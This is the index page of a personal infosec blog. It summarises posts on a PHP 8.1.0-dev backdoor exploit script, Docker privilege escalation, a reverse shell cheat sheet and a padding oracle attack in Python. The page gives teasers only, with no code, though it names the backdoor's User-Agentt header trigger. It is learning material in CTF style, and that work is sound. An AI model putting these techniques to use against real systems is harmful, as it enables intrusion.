My Infosec Blog - Stay curious !
My Infosec Blog - Stay curious !
$ ls -la .contact: flast101.sec@gmail.com
$(whoami): Me, Myself and I.
Hack The Box writeups: here are walkthroughs to root machines on the HackTheBox website, an online platform for learning and teaching cyber security.
Writeups list:
23 may 2021
PHP 8.1.0-dev Backdoor System Shell Script
PHP verion 8.1.0-dev was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The original code was restored after the issue was discovered, but then tampered with a second time. The breach would have created a backdoor in any websites that ran the compromised version of PHP, enabling hackers to perform remote code execution on the site.
I wrote a short exploit script using the backdoor to provide a pseudo system shell on the host.
Read more …
9 August 2020
Privilege escalation in Docker
In this article, I talk about a classic privilege escalation through Docker containers. This is a very well known trick used when the configuration let too many accounts run docker, and you will have to do it in some CTF boxes at least. Unfortunately, it is not always correcly understood.
I had a lot of fun the first time I encountered it in PWK lab as wells as the second time on a HTB machine.
Let’s see what it is about.
Read more …
7 August 2020
My Reverse Shell Cheat Sheet
You can find them all around the internet. I couldn’t find them all in one place, so I write them down here. Don’t hesitate to tell me if you find some more and I will add them to this list.
Read more …
4 July 2020
Padding Oracle attack fully explained and coded from scratch in Python3
The padding oracle attack is a spectacular attack because it allows to decrypt a message that has been intercepted if the message was encrypted using CBC mode. POODLE (Padding Oracle On Downgraded Legacy Encryption) is a man-in-the-middle exploit which takes advantage of Internet and security software clients’ fallback to SSL 3.0. If attackers successfully exploit this vulnerability, on average, they only need to make 256 SSL 3.0 requests to reveal one byte of encrypted messages.
It will only require ensuring that we are able to obtain a response from the server that will serve as an Oracle (we’ll come back to these in more detail later in this report). We will then be able to decrypt the entire message except the first block, unless we know the initialization vector.
In this article, we will focus on how to use this vulnerability and propose a python script that exploits CBC mode to decrypt a message encrypted in AES-CBC.
Read more …
Stay curious !